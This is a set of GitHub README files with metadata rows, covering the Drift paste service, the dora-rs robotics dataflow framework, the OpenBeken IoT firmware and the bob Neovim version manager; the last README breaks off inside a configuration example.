- Place the following systemd unit inside ___/home/user/.config/systemd/user___ and name it _drift_user.service_
- Replace any occurrence of ___`$USERNAME`___ with the shell username of the user that will be running the Drift server
```
##########
# Drift Systemd Unit (User)
##########
[Unit]
Description=Drift Server (User)
After=default.target
[Service]
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure
[Install]
WantedBy=default.target
```
## Current status
Drift is a work in progress. Below is a (rough) list of completed and envisioned features. If you want to help address any of them, please let me know regardless of your experience and I'll be happy to assist.
- [x] Next.js 13 `app` directory
- [x] creating and sharing private, public, password-protected, and unlisted posts
- [x] syntax highlighting
- [x] expiring posts
- [x] responsive UI
- [x] user auth
- [ ] SSO via HTTP header (Issue: [#11](https://github.com/MaxLeiter/Drift/issues/11))
- [x] SSO via GitHub OAuth
- [x] downloading files (individually and entire posts)
- [x] password protected posts
- [x] postgres database
- [x] administrator account / settings
- [x] docker-compose (PRs: [#13](https://github.com/MaxLeiter/Drift/pull/13), [#75](https://github.com/MaxLeiter/Drift/pull/75))
- [ ] publish docker builds
- [ ] user settings
- [ ] works enough with JavaScript disabled
- [ ] in-depth documentation
- [x] customizable homepage, so the demo can exist as-is but other instances can be built from the same source. Environment variable for the file contents?
- [ ] fleshed out API
- [ ] Swappable database backends
- [ ] More OAuth providers
| Drift is a self-hostable Gist and paste service. Built with Next.js 13 and React Server Components. | gist,pastebin,pastebin-service,nodejs,nextjs,react,typescript,self-hosted,drift,nextjs13 | 0 | 14 | 90 | 470 | 29 | 24 | 1 |
dora-rs/dora | <p align="center">
<img src="./docs/src/logo.svg" width="400">
</p>
<h2 align="center">
<a href="https://www.dora-rs.ai">Website</a>
|
<a href="https://www.dora-rs.ai/docs/api/python-api">Python API</a>
-
<a href="https://docs.rs/dora-node-api/latest/dora_node_api/">Rust API</a>
|
<a href="https://www.dora-rs.ai/docs/guides/">Guide</a>
|
<a href="https://discord.gg/6eMGGutkfE">Discord</a>
</h2>
<div align="center">
<a href="https://github.com/dora-rs/dora/actions">
<img src="https://github.com/dora-rs/dora/workflows/CI/badge.svg" alt="Build and test"/>
</a>
<a href="https://crates.io/crates/dora-rs">
<img src="https://img.shields.io/crates/v/dora_node_api.svg"/>
</a>
<a href="https://docs.rs/dora-node-api/latest/dora_node_api/">
<img src="https://docs.rs/dora-node-api/badge.svg" alt="rust docs"/>
</a>
<a href="https://pypi.org/project/dora-rs/">
<img src="https://img.shields.io/pypi/v/dora-rs.svg" alt="PyPi Latest Release"/>
</a>
</div>
---
# What is dora-rs?
Dataflow-oriented robotic application (dora-rs) is a framework that makes the creation of robotic applications fast and simple.
Building a robotic application can be summed up as bringing together hardware, algorithms, and AI models, and making them communicate with each other. At dora-rs, we try to:
- make integration of hardware and software easy by supporting Python, C, C++, and also ROS2.
- make communication low latency by using zero-copy Arrow messages.
dora-rs is still experimental and you might experience bugs, but we're working very hard to make it as stable as possible.
## Performance
dora-rs can show impressive performance, up to 17x faster than the current status quo, ROS 2 in Python! This is the result of using our own shared memory server and Apache Arrow to achieve zero-copy data passing.
<a href="https://www.dora-rs.ai/">
<img src="./docs/src/latency.png" align="center" width="600">
</a>
> See: https://github.com/dora-rs/dora-benchmark/tree/main for reproduction.
## Dataflow Paradigm
dora-rs implements a declarative dataflow paradigm where tasks are split between nodes isolated as individual processes.
Each node defines its inputs and outputs to connect with other nodes.
```yaml
nodes:
- id: webcam
custom:
source: webcam.py
inputs:
tick: dora/timer/millis/50
outputs:
- image
- id: object_detection
custom:
source: object_detection.py
inputs:
image: webcam/image
outputs:
- bbox
- id: plot
custom:
source: plot.py
inputs:
image: webcam/image
bbox: object_detection/bbox
```
Nodes can either be:
- custom nodes, where dora-rs is embedded as a native library.
- runtime nodes, where dora-rs takes care of the main loop and runs user-defined operators. This makes dora-rs more featureful, as we can run features like `hot-reloading`.
The dataflow paradigm has the advantage of creating an abstraction layer that makes robotic applications modular and easily configurable.
<a href="https://www.dora-rs.ai/">
<img src="https://raw.githubusercontent.com/dora-rs/dora-rs.github.io/main/static/img/overview.svg" align="center" width="600">
</a>
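To make this concrete, a custom node like `object_detection` above could be sketched in Python roughly as follows. This is a hedged illustration, not dora's reference implementation: it assumes the `dora` Python package exposes a `Node` that yields input events and a `send_output` method taking Arrow data (as in the python-operator-dataflow examples referenced later), so check the Python API docs for the exact signatures.
```python
# Rough sketch of a custom node (assumed `dora` Python API; verify against the docs).
import pyarrow as pa
from dora import Node

node = Node()

for event in node:
    # Input events carry the id declared in the dataflow YAML ("image" here).
    if event["type"] == "INPUT" and event["id"] == "image":
        image = event["value"]  # Arrow data shared with the sender on the same machine
        # ... run your detector on `image` here ...
        bbox = pa.array([0.1, 0.2, 0.4, 0.5])  # placeholder result
        # Published as `object_detection/bbox` for downstream nodes like `plot`.
        node.send_output("bbox", bbox, event["metadata"])
```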
## Communication
Communication between nodes is handled with shared memory on the same machine and TCP across distributed machines. Our shared memory implementation tracks messages across processes and discards them when obsolete. Shared memory slots are cached to avoid new memory allocations.
## Message Format
Nodes communicate using the Apache Arrow data format.
[Apache Arrow](https://github.com/apache/arrow-rs) is a universal memory format for flat and hierarchical data. The Arrow memory format supports zero-copy reads for lightning-fast data access without serialization overhead. It defines a C data interface without any build-time or link-time dependency requirement, which means that dora-rs has **no compilation step** beyond the native compiler of your favourite language.
<img align="center" src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/arrow.png?raw=true" width="600">
## Opentelemetry
dora-rs uses Opentelemetry to record all your logs, metrics and traces. This means that the data and telemetry can be linked using a shared abstraction.
[Opentelemetry](https://opentelemetry.io/) is an open source observability standard that makes dora-rs telemetry collectable by most backends, such as Elasticsearch, Prometheus, and Datadog.
Opentelemetry is language independent, backend agnostic, and easily collects distributed data, making it perfect for dora-rs applications.
<img src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/opentelemetry.png?raw=true" align="center" width="600">
## Hot-Reloading
dora-rs implements hot-reloading for Python, which means you can change code at runtime while keeping your state intact.
With the flags `--attach --hot-reload`, dora-rs watches for code changes and reloads nodes that have been modified.
You can check the fail-safe mechanism at: https://github.com/dora-rs/dora/pull/239
<a href="http://www.youtube.com/watch?v=NvvTEP8Jak8">
<img align="center" width="600" alt="demo" src=http://img.youtube.com/vi/NvvTEP8Jak8/0.jpg>
</a>
## Self-Coding Robot: Code RAG (WIP)
You can easily create a self-coding robot by combining hot-reloading with Retrieval Augmented Generation (RAG) that generates code modifications from your prompt.
See:[examples/python-operator-dataflow](examples/python-operator-dataflow)
<img src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/RAG.svg?raw=true" align="center" width="600">
Self-Coding Robot is just the tip of the iceberg of robotics combined with LLMs that we hope to power. There is so much more that we haven't explored yet, like:
- [self-debugging](https://arxiv.org/pdf/2304.05128.pdf)
- [memory](https://github.com/cpacker/MemGPT)
- [function calling](https://github.com/ShishirPatil/gorilla)
- ...
## Installation
Quickest way:
```bash
cargo install dora-cli --locked
pip install dora-rs # For Python API
dora --help
```
For more info on installation, check out [our guide](https://www.dora-rs.ai/docs/guides/Installation/installing).
## Getting Started
1. Install the example python dependencies:
```bash
pip install -r https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/requirements.txt
```
2. Get some example operators:
```bash
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/webcam.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/plot.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/utils.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/object_detection.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/dataflow.yml
```
3. Start the dataflow
```bash
dora up
dora start dataflow.yml --attach --hot-reload
```
> Make sure to have a webcam
To stop your dataflow, you can use <kbd>ctrl</kbd>+<kbd>c</kbd>
To go further, you can add a yolov8 operator, check out our getting started here: https://www.dora-rs.ai/docs/guides/getting-started/yolov8/
## ROS2 Bridge
- Compilation Free Message passing to ROS 2
- Automatic conversion ROS 2 Message <-> Arrow Array
```python
import random
import pyarrow as pa
# Configuration Boilerplate...
turtle_twist_writer = ...
## Arrow Based ROS2 Twist Message
## which does not require a ROS2 import
message = pa.array([{
"linear": {
"x": 1,
},
"angular": {
"z": 1
},
}])
turtle_twist_writer.publish(message)
```
> You might want to use ChatGPT to write the Arrow Formatting: https://chat.openai.com/share/4eec1c6d-dbd2-46dc-b6cd-310d2895ba15
## Hardwares
Cool hardware that we think might be a good fit to try out dora-rs 🙋 We are not sponsored by manufacturers:
| | Price | Open Source | Github | type | Dora Project |
| --------------------------------- | ----- | ------------------ | ---------------------------------------------------- | ---------- | ------------------------------------------------------- |
| DJI Robomaster S1 | 550$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover | https://huggingface.co/datasets/dora-rs/dora-robomaster |
| DJI Robomaster EP Core | 950$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover, Arm | |
| DJI Tello | 100$ | | | Drone | |
| BitCraze Crazyflies | 225$ | Firmware, Lib, SDK | https://github.com/bitcraze | Drone | |
| AlexanderKoch-Koch/low_cost_robot | 250$ | Everything | https://github.com/AlexanderKoch-Koch/low_cost_robot | Arm | |
| xArm 1S | 200$ | | | Arm | |
| Wavego | 250$ | | | Quadruplet | |
| AINex | 800$ | | | Humanoid | |
> For more: https://docs.google.com/spreadsheets/d/1YYeW2jfOIWDVgdEgqnMvltonHquQ7K8OZCrnJRELL6o/edit#gid=0
## Documentation
The full documentation is available on [our website](https://www.dora-rs.ai)
## Discussions
Our main communication channels are:
- [Our Discord server](https://discord.gg/6eMGGutkfE)
- [Our Github Project Discussion](https://github.com/orgs/dora-rs/discussions)
Feel free to reach out on any topic, issues or ideas.
We also have [a contributing guide](CONTRIBUTING.md).
## Support Matrix
| | dora-rs | Hoped for |
| --------------------------------- | --------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------- |
| **Tier 1 Support** | Python, Rust | C, C++, ROS 2 |
| **Tier 2 Support** | C, C++, ROS2 |
| **Hot-reloading** | Python | Rust (https://github.com/orgs/dora-rs/discussions/360) |
| **Message Format** | Arrow | Native |
| **Local Communication** | Shared Memory | Custom Middleware, [zero-copy GPU IPC](https://arrow.apache.org/docs/python/api/cuda.html), intra-process `tokio::channel` communication |
| **Remote Communication** | TCP (See: https://github.com/dora-rs/dora/issues/459) | Custom Middleware, [Zenoh](https://zenoh.io/) |
| **Metrics, Tracing, and Logging** | Opentelemetry | Native logging libraries into Opentelemetry |
| **Data archives** | Parquet ([dora-record](libraries/extensions/dora-record)) |
| **Visualization and annotation** | OpenCV | [rerun.io](rerun.io) |
| **Supported Platforms (x86)** | Windows, macOS, Linux |
| **Supported Platforms (ARM)** | macOS, Linux |
| **Configuration** | YAML |
### Unstable functionality
`dora-rs` Ros2 Bridge is marked as **unstable**.
There are a number of reasons functionality may be marked as unstable:
- We are unsure about the exact API. The name, function signature, or implementation are likely to change in the future.
- The functionality is not tested extensively yet. Bugs may pop up when used in real-world scenarios.
- The functionality does not integrate well with the full dora-rs API. You may find it works in one context but not in another.
Releasing functionality as unstable allows us to gather important feedback from users that use dora-rs in real-world scenarios.
This helps us fine-tune things before giving it the final stamp of approval.
Users who are only interested in solid, well-tested functionality can avoid this part of the API.
Functionality marked as unstable may change at any point without it being considered a breaking change.
## License
This project is licensed under Apache-2.0. Check out [NOTICE.md](NOTICE.md) for more information.
| DORA (Dataflow-Oriented Robotic Application) is middleware designed to streamline and simplify the creation of AI-based robotic applications. It offers low latency, composable, and distributed dataflow capabilities. Applications are modeled as directed graphs, also referred to as pipelines. | dataflow,low-latency,robotics,rust,embodied-ai | 35 | 16 | 368 | 2,248 | 46 | 31 | 4 |
openshwprojects/OpenBK7231T_App | # Introduction
OpenBK7231T/OpenBeken is a Tasmota/Esphome replacement for new Tuya modules featuring MQTT and Home Assistant compatibility.
This repository is named "OpenBK7231T_App", but now it's a multiplatform app, supporting build for multiple separate chips:
- [BK7231T](https://www.elektroda.com/rtvforum/topic3951016.html) ([WB3S](https://developer.tuya.com/en/docs/iot/wb3s-module-datasheet?id=K9dx20n6hz5n4), [WB2S](https://developer.tuya.com/en/docs/iot/wb2s-module-datasheet?id=K9ghecl7kc479), WB2L, etc)
- [BK7231N](https://www.elektroda.com/rtvforum/topic3951016.html) ([CB2S](https://developer.tuya.com/en/docs/iot/cb2s-module-datasheet?id=Kafgfsa2aaypq), [CB2L](https://developer.tuya.com/en/docs/iot/cb2l-module-datasheet?id=Kai2eku1m3pyl), [WB2L_M1](https://www.elektroda.com/rtvforum/topic3903356.html), etc)
- [BK7231M](https://www.elektroda.com/rtvforum/topic4058227.html), this is a non-Tuya version of BK7231N with 00000000 keys, also sometimes in BL2028 flavour
- T34 ([T34 is based on BK7231N](https://developer.tuya.com/en/docs/iot/t34-module-datasheet?id=Ka0l4h5zvg6j8)), see [flashing trick](https://www.elektroda.com/rtvforum/topic4036975.html)
- BL2028N ([BL2028N is a Belon version of BK7231N](https://www.elektroda.com/rtvforum/viewtopic.php?p=20262533#20262533))
- [XR809](https://www.elektroda.com/rtvforum/topic3806769.html) ([XR3](https://developer.tuya.com/en/docs/iot/xr3-datasheet?id=K98s9168qi49g), etc)
- [BL602](https://www.elektroda.com/rtvforum/topic3889041.html) ([SM-028_V1.3 etc](https://www.elektroda.com/rtvforum/topic3945435.html)), see also [BL602 flash OBK via OTA tutorial](https://www.elektroda.com/rtvforum/topic4050297.html)
- [LF686](https://www.leapfive.com/wp-content/uploads/2020/09/LF686-Datasheet.pdf) (flash it [as BL602](https://www.elektroda.com/rtvforum/topic4024917.html))
- W800 (W800-C400, WinnerMicro WiFi & Bluetooth), W801
- [W600](https://www.elektroda.com/rtvforum/viewtopic.php?p=20252619#20252619) (WinnerMicro chip), W601 ([WIS600, ESP-01W](https://www.elektroda.com/rtvforum/topic3950611.html), [TW-02](https://www.elektroda.com/rtvforum/viewtopic.php?p=20239610#20239610), [TW-03](https://www.elektroda.com/rtvforum/topic3929601.html), etc)
- [LN882H](https://www.elektroda.com/rtvforum/topic4027545.html) by Lightning Semi - [datasheet](https://www.elektroda.com/rtvforum/topic4027545.html), see [flashing how-to](https://www.elektroda.com/rtvforum/topic4028087.html), see [sample device teardown and flashing](https://www.elektroda.com/rtvforum/topic4032240.html), see [new flash tool](https://www.elektroda.com/rtvforum/topic4045532.html), see [dev board](https://www.elektroda.com/rtvforum/topic4050274.html)
- Windows, via [simulator](https://www.elektroda.com/rtvforum/topic4046056.html)
Please use automatically compiled binaries from the Releases tab. To build yourself for a given platform, first check out our version of the SDK and then check out this app repository into it; details later.
See our guides in Russian: [BK7231N/T34](https://www.v-elite.ru/t34), and [BL602 RGB](https://www.v-elite.ru/bl602rgb), and [Youtube guide for BK7231/T34](https://www.youtube.com/watch?v=BnmSWZchK-E)
If you want to get some generic information about BK7231 modules, available datasheets, pinout, peripherals, [consult our docs topic](https://www.elektroda.com/rtvforum/topic3951016.html).
# [Supported Devices/Templates List](https://openbekeniot.github.io/webapp/devicesList.html) Now with 500+ entries! (Get 🏆[free SD Card](https://www.elektroda.com/rtvforum/topic3950844.html)🏆 for submitting new one!)
We have our own interactive devices database that is maintained by users.
The database is also accessible from inside our firmware (but requires internet connection to fetch).
Have a not listed device? HELP US, submit a teardown [here](https://www.elektroda.com/rtvforum/posting.php?mode=newtopic&f=51) and 🏆**get free SD card and gadgets set**🏆 ! Thanks to cooperation with [Elektroda.com](https://www.elektroda.com/), if you submit a detailed teardown/article/review, we can send you [this set of gadgets](https://obrazki.elektroda.pl/1470574200_1670833596.jpg) for free (🚚shipping with normal letter🚚).
NOTE: Obviously, almost any device with a supported chip (BK7231, BL602, W600, etc.) is potentially supported; it's not possible to list all available devices on the market, so feel free to try even if your device is not listed - *we are [here](https://www.elektroda.com/rtvforum/forum390.html) to help and guide you step by step!*
# [Our Youtube Channel](https://www.youtube.com/@elektrodacom) (See step by step guides for flashing and setup)
We have our own Youtube channel with OBK-related guides. Please see our playlists:
- [flashing guides playlist](https://www.youtube.com/playlist?list=PLzbXEc2ebpH0CZDbczAXT94BuSGrd_GoM)
- [generic setup hints, tricks, tips](https://www.youtube.com/playlist?list=PLzbXEc2ebpH0I8m_Cfbqv1MTlQuBKYvlx)
You can help us by giving like, a comment and subscribe!
# Features
OpenBeken features:
- Tasmota-like setup, configuration and experience on all supported platforms (supports [common Tasmota JSON over http](https://www.youtube.com/watch?v=OhdkEJ-SuTU) and MQTT, etc)
- OTA firmware upgrade system (for BK, W*00, BL602, LN); to use OTA, [drag and drop](https://www.youtube.com/watch?v=OPcppowaxaA) proper OTA file on OTA field on new Web App Javascript Console
- Online [builds for all platforms](https://github.com/openshwprojects/OpenBK7231T_App/releases) via Github, configurable [per-user build system](https://www.elektroda.com/rtvforum/topic4033833.html), also supports [Docker builds](https://github.com/openshwprojects/OpenBK7231T_App/tree/main/docker)
- MQTT compatibility with Home Assistant (with both Yaml generator and [HA Discovery](https://youtu.be/pkcspey25V4))
- Support for multiple relays, buttons, leds, inputs and PWMs, everything fully scriptable
- [Driver system](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/docs/drivers.md) for custom peripherals, including [TuyaMCU](https://www.elektroda.com/rtvforum/topic4038151.html) (see [Dimmer tutorial](https://www.elektroda.com/rtvforum/topic3898502.html)), I2C bus and [BL0942](https://www.elektroda.com/rtvforum/topic3887748.html), BL0937 power metering chips, Motor Driver Bridge.
- Hardware and software I2C, supports multiple I2C devices, like TC74 temperature sensor, MCP23017 port expander, PCF8574T LCD 2x16 (or other?), etc
- Hardware and software SPI, support for SPI BL0942, etc
- NTP time from network (can be used with [TH06](https://www.elektroda.com/rtvforum/topic3942730.html) and other TuyaMCU devices), can run any script on selected weekday hour:minute:second
- Dedicated [TuyaMCU support](https://www.elektroda.com/rtvforum/topic4038151.html) with extra TuyaMCU analyzer tool for decoding new devices ([tutorial here](https://www.elektroda.com/rtvforum/topic3970199.html), code [repository here](https://github.com/openshwprojects/TuyaMCUAnalyzer))
- support for [TuyaMCU Battery Powered devices protocol](https://www.elektroda.com/rtvforum/topic3914412.html) (TuyaMCU enables WiFi module only to report the state, eg. for door sensors, water sensors)
- [RGBCW LED lighting control](https://www.youtube.com/watch?v=YQdR7r6lXRY) compatible with Home Assistant (including PWM LEDs, and SM2135, BP5758, [SM15155](https://www.elektroda.com/rtvforum/topic4060227.html) etc )
- LittleFS integration for scripts and large files (you can [write scripts there](https://www.youtube.com/watch?v=kXi8S12tmC8), you can host a page there with [REST interface control](https://www.elektroda.com/rtvforum/topic3971355.html) of device)
- Command line system for starting and configuring drivers, for controlling channels, etc
- Short startup command (up to 512 characters) storage in flash config, so you can easily init your drivers (eg. BL0942) without LittleFS
- Advanced scripting and events system (allows you to mirror Tasmota rules, for example catch button click, double click, hold)
- Easily configurable via commands (see [tutorial](https://www.elektroda.com/rtvforum/topic3947241.html))
- Thanks to keeping Tasmota standard, OBK has basic compatibility with [ioBroker](https://www.youtube.com/watch?v=x4p3JHXbK1E&ab_channel=Elektrodacom) and similar systems through TELE/STAT/CMND MQTT packets, Tasmota Control app is also supported
- [DDP lighting protocol support](https://www.elektroda.com/rtvforum/topic4040325.html) ("startDriver DDP" in autoexec.bat/short startup command), works with xLights,
- Can be scripted to even [work with shutters](https://www.elektroda.com/rtvforum/topic3972935.html), see also [second shutters script](https://www.elektroda.com/rtvforum/viewtopic.php?p=20910126#20910126)
- Password-protected Web security [see tutorial](https://www.elektroda.com/rtvforum/topic4021160.html)
- Advanced deep sleep with GPIO/timer wakeup and [hybrid power save systems](https://youtu.be/eupL16eB7BA), fully scriptable, can be configured to last longer than Tuya
- Supports automatic GPIO setup with [Tuya GPIO extraction](https://www.youtube.com/watch?v=WunlqIMAdgw), [cloudcutter templates](https://www.elektroda.com/rtvforum/topic3973669.html), can also import/export [OpenBeken templates](https://openbekeniot.github.io/webapp/devicesList.html), you can also use [GPIODoctor to find out quickly GPIO roles](https://www.elektroda.com/rtvforum/topic3976371.html)
- Advanced and custom drivers like [synchronized PWM groups with configurable dead time](https://www.elektroda.com/rtvforum/topic4025665.html)
- WS2812B support, see [scripting tutorial](https://www.elektroda.com/rtvforum/topic4036716.html)
- LFS and REST API allows you to create and host a custom HTML+CSS+JS page on device with a custom GUI/display of channels/TuyaMCU dpIDs, see [tutorial](https://www.elektroda.com/rtvforum/topic3971355.html) and see [sample page](https://www.elektroda.com/rtvforum/viewtopic.php?p=20932186#20932186) , and see [final version of custom TOMPD-63-WIFI page](https://www.elektroda.com/rtvforum/topic4040354.html)
- can control 'smart lab organiser drawers' with a custom Drawers driver, see [full presentation](https://www.elektroda.com/rtvforum/topic4054134.html)
- Can run on Windows with device simulator/schematic drawer, see [tutorial](https://www.elektroda.com/rtvforum/topic4046056.html)
- and much more
There is also a bit more outdated [WIKI](https://github.com/openshwprojects/OpenBK7231T_App/wiki/Wiki-Home)
# Building
OpenBeken supports [online builds](https://www.elektroda.com/rtvforum/viewtopic.php?p=20946719#20946719) for all platforms (BK7231T, BK7231N, XR809, BL602, W800), but if you want to compile it yourself, see [BUILDING.md](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/BUILDING.md)
# Developer guides
- online builds system [guide](https://www.elektroda.com/rtvforum/viewtopic.php?p=20946719#20946719)
- how to [create custom obk driver](https://www.elektroda.com/rtvforum/topic4056286.html)
- how to [analyze unknown protocol with Salae logic analyzer](https://www.elektroda.com/rtvforum/topic4035491.html)
- obk [simulator short presentation](https://www.elektroda.com/rtvforum/topic4046056.html)
# Flashing
See [our GUI easy flash tool](https://github.com/openshwprojects/BK7231GUIFlashTool), also see [FLASHING.md](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/FLASHING.md)
# [Docs - MQTT topics, Console Commands, Flags, Constants, Pin Roles, Channel Types, FAQ, autoexec.bat examples](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/docs)
# Further reading
For technical insights and generic SDK information related to Beken, WinnerMicro, Bouffallo Lab and XRadio modules, please refer to:
https://www.elektroda.com/rtvforum/topic3850712.html
https://www.elektroda.com/rtvforum/topic3866123.html
https://www.elektroda.com/rtvforum/topic3806769.html
# Support project
If you want to support project, please donate at: https://www.paypal.com/paypalme/openshwprojects
Special thanks to the Tasmota/Esphome/etc contributors for making a great reference for implementing Tuya module drivers
| Open source firmware (Tasmota/Esphome replacement) for BK7231T, BK7231N, BL2028N, T34, XR809, W800/W801, W600/W601 and BL602 | wifi,iot,mqtt,smart-home,tuya,tasmota,bk7231,bk7231n,bk7231t,bl602 | 1,000 | 73 | 524 | 3,467 | 407 | 59 | 1 |
MordechaiHadad/bob | <div align="center">
<img src="resources/bob-nvim-logo-2-transparent-bg.png" width=315>
</div>
# Bob
> Struggle to keep your Neovim versions in check? Bob provides an easy way to install and switch versions on any system!
Bob is a cross-platform and easy-to-use Neovim version manager, allowing for easy switching between versions right from the command line.
## 🌟 Showcase
<img src="./resources/tapes/demo.gif">
## 🔔 Notices
- **2022-10-29**: Moved bob's symbolic link and downloads folder on macos from `/Users/user/Library/Application Support` to `~/.local/share` please make sure to move all of your downloads to the new folder, run `bob use <your desired version>` and update your PATH
- **2023-02-13**: Bob has recently switched to using a proxy executable for running Neovim executables. To switch from the old method that Bob used, follow these steps:
1. Remove the current Neovim path from your global $PATH environment variable.
2. Delete the following directory:
On Unix: `~/.local/share/neovim`
On Windows: `C:\Users\<username>\AppData\Local\neovim`
Secondly the name of the downloads directory property in the configuration file has changed. Please refer to the updated list of properties for the new name.
- **2024-03-04**: Due to Neovim's recent MacOS binary changes, bob now supports arm completely, but unfortunately, it comes with some breaking changes specifically for bob's proxy executable. To fix that, follow these steps (which will not be necessary soon):
1. Remove the `nvim` binary from `nvim-bin`, which is located in the same directory as the neovim binaries downloads folder.
2. Copy your newly downloaded bob binary and put the copy inside of `nvim-bin`
3. Rename your bob binary inside `nvim-bin` to `nvim`.
- **2024-05-17**: Support for `nvim-qt` is now deprecated as Neovim no longer supports it in newer releases. If you're currently using `nvim-qt`, we recommend switching to a different Neovim GUI or using Neovim in the terminal. Please refer to the Neovim documentation for more information on supported GUIs.
- **2024-05-19**: Important notice for users who built Neovim from source using a commit hash before the newest Bob version: Due to recent changes in Bob, these versions will need to be rebuilt. Alternatively, you can manually add a file named `full-hash.txt` at the root of the directory. This file should contain the full hash of the commit used to build Neovim. This change ensures better tracking and management of versions built from source. We apologize for any inconvenience and appreciate your understanding.
## 📦 Requirements
Make sure you don't have Neovim already installed in other ways, e.g. via a package manager.
#### Building bob
Make sure [rustup](https://www.rust-lang.org/tools/install) is installed.
(Optional) `openssl` if built with `native-tls` feature.
#### Building Neovim
For further information refer to the [Neovim wiki](https://github.com/neovim/neovim/wiki/Building-Neovim#build-prerequisites).
<details>
<summary>All platforms</summary>
- CMake
- Git
</details>
<details>
<summary>Windows</summary>
- [Visual Studio Build Tools](https://visualstudio.microsoft.com/visual-cpp-build-tools/) with C++ extension pack
</details>
<details>
<summary>Unix</summary>
- Clang or GCC
**MacOS note**: [follow these instructions](https://github.com/neovim/neovim/wiki/Building-Neovim#macos--homebrew)
</details>
## 🔧 Installation
### Install from releases
1. Download the bob release suitable for your platform: either `bob-{platform}-x86_64.zip` for the standard version or `bob-{platform}-x86_64-openssl.zip` for the OpenSSL version.
2. Unzip it
3. Run it with `bob`
### Install with pacman
1. On Arch Linux, you can install `bob` from the [extra repository](https://archlinux.org/packages/extra/x86_64/bob/) using pacman: `pacman -S bob`
2. Run it with `bob`
### Install from source
For the standard version:
1. `cargo install --git https://github.com/MordechaiHadad/bob.git`
2. Run Bob with `bob`
For the OpenSSL version:
1. To install, include the `--no-default-features --features native-tls` flags with your command: `cargo install --git https://github.com/MordechaiHadad/bob.git --no-default-features --features native-tls`
2. Run Bob with `bob`
### Install from crates.io
1. `cargo install bob-nvim`
2. Run bob with `bob`
## ❓ Usage
A version-string can be either `vx.x.x` or `x.x.x`; examples: `v0.6.1` and `0.6.0`
---
- `bob use |nightly|stable|latest|<version-string>|<commit-hash>|`
`--no-install` flag will prevent bob from auto invoking install command when using `use`
Switch to the specified version, by default will auto-invoke install command if the version is not installed already
---
- `bob install |nightly|stable|latest|<version-string>|<commit-hash>|`
Install the specified version, can also be used to update out-of-date nightly version.
---
- `bob sync`
If Config::version_sync_file_location is set, the version in that file will be parsed and installed.
---
- `bob uninstall [|nightly|stable|latest|<version-string>|<commit-hash>|]`
Uninstall the specified version. If no version is specified a prompt is used to select all the versions
to be uninstalled.
---
- `bob rollback`
Rollback to an existing nightly rollback
---
- `bob erase`
Erase any change bob ever made including Neovim installation, Neovim version downloads and registry changes.
---
- `bob list`
List all installed and used versions.
---
- `bob complete bash|elvish|fish|powershell|zsh`
Generate shell completion.
---
- `bob update |nightly|stable|--all|`
Update existing version, can specify either a version or the flag `--all`
---
- `bob list-remote`
List all remote neovim versions available for download.
---
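Putting a few of these together, a typical session might look like the sketch below (`v0.9.5` is just an example version string):
```console
bob install stable      # install the latest stable release
bob use nightly         # switch versions, auto-installing nightly if needed
bob list                # show installed versions and the one currently in use
bob uninstall v0.9.5    # remove a version you no longer need
```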
## ⚙ Configuration
This section is a bit more advanced, so the user will have to do the work themselves, since bob doesn't do it automatically.
Bob's configuration file can be written in either JSON or TOML format. The file should be located at `config_dir/bob/config.json` or `config_dir/bob/config.toml` respectively. However, the location of the configuration file can be customized as explained [below](#config-location), to be more specific:
<details>
<summary>On Linux</summary>
`/home/user/.config/bob/config.json|toml`
</details>
<details>
<summary>On Windows</summary>
`C:\Users\user\AppData\Roaming\bob\config.json|toml`
</details>
<details>
<summary>On MacOS</summary>
`/Users/user/Library/Application Support/bob/config.json|toml`
</details>
### Increasing Github rate-limit
It is possible to use `GITHUB_TOKEN` to prevent rate-limit for API calls. There are two ways to do it:
- You can prepend any of the `bob` commands with `GITHUB_TOKEN=<your token>`
```console
GITHUB_TOKEN=<some token> bob update -a
```
- perform `export GITHUB_TOKEN=<your token>` and then run `bob` commands.
```console
export GITHUB_TOKEN=<some token>
bob update -a
```
### <a name="config-location"></a>Custom Location
Bob's config file location can be configured by using an environment variable called `$BOB_CONFIG`.
Example: `export BOB_CONFIG=/path/to/config/config.json|toml`
### Syntax
| Property | Description | Default Value |
| -------------------------------| ---------------------------------------------------------------------------------------------------------------------------------------------------------------| --------------------------------------------------------------------------------------------------------------|
| **enable_nightly_info** | Will show new commits associated with new nightly release if enabled | `true` |
| **enable_release_build** | Compile neovim nightly or a certain hash version as a release build (slightly improved performance, no debug info) | `false` |
| **downloads_location** | The folder in which neovim versions will be downloaded to, bob will error if this option is specified but the folder doesn't exist | unix: `/home/<username>/.local/share/bob`, windows: `C:\Users\<username>\AppData\Local\bob` |
| **installation_location** | The path in which the proxied neovim installation will be located in | unix: `/home/<username>/.local/share/bob/nvim-bin`, windows: `C:\Users\<username>\AppData\Local\bob\nvim-bin` |
| **version_sync_file_location** | The path to a file that will hold the neovim version string, useful for config version tracking, bob will error if the specified file is not a valid file path | `Disabled by default` |
| **rollback_limit** | The amount of rollbacks before bob starts to delete older ones, can be up to 255 | `3` |
| **github_mirror** | Specify the github mirror to use instead of `https://github.com`, example: `https://mirror.ghproxy.com` | `Disabled by default` |
### Example
```jsonc
// /home/user/.config/bob/config.json
{
"enable_nightly_info": true, // Will show new commits associated with new nightly release if enabled
"enable_release_build": false, // Compile neovim nightly or a certain hash version as a release build (slightly improved performance, no debug info)
"downloads_location": "$HOME/.local/share/bob", // The folder in which neovim versions will be installed too, bob will error if this option is specified but the folder doesn't exist
